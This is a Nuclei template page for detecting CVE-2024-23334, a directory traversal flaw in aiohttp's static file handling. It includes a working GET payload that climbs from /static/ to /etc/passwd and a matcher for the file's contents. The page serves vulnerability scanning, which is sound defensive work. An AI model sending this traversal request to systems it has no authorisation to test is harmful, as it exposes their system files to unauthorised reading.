Skip to content
Nuclei Templates

aiohttp - Directory Traversal

ID: CVE-2024-23334

Severity: high

Author: DhiyaneshDk

Tags: cve,cve2024,aiohttp,lfi

Description

Section titled “Description”

aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option ‘follow_symlinks’ can be used to determine whether to follow symbolic links outside the static root directory. When ‘follow_symlinks’ is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue.

YAML Source

Section titled “YAML Source”
id: CVE-2024-23334


info:
  name: aiohttp - Directory Traversal
  author: DhiyaneshDk
  severity: high
  description: |
    aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue.
  reference:
    - https://lists.fedoraproject.org/archives/list/[email protected]/message/ICUOCFGTB25WUT336BZ4UNYLSZOUVKBD/
    - https://lists.fedoraproject.org/archives/list/[email protected]/message/XXWVZIVAYWEBHNRIILZVB3R3SDQNNAA7/
    - https://x.com/W01fh4cker/status/1762491210953060827?s=20
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-23334
    cwe-id: CWE-22
    epss-score: 0.00073
    epss-percentile: 0.29411
    cpe: cpe:2.3:a:aiohttp:aiohttp:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: aiohttp
    product: aiohttp
  tags: cve,cve2024,aiohttp,lfi


http:
  - method: GET
    path:
      - '{{BaseURL}}/static/../../../../etc/passwd'


    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"


      - type: word
        part: header
        words:
          - "aiohttp"
          - "application/octet-stream"
        condition: and


      - type: status
        status:
          - 200
# digest: 4b0a00483046022100eeb5b408314ab7b16905c71d6bb7cf7449b32faedbba78d7216dac1cb3af0163022100fd6014ed955969b00028b40a2a57d76723ca17642b49fc0797989dfcfd17641b:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-23334.yaml"

View on Github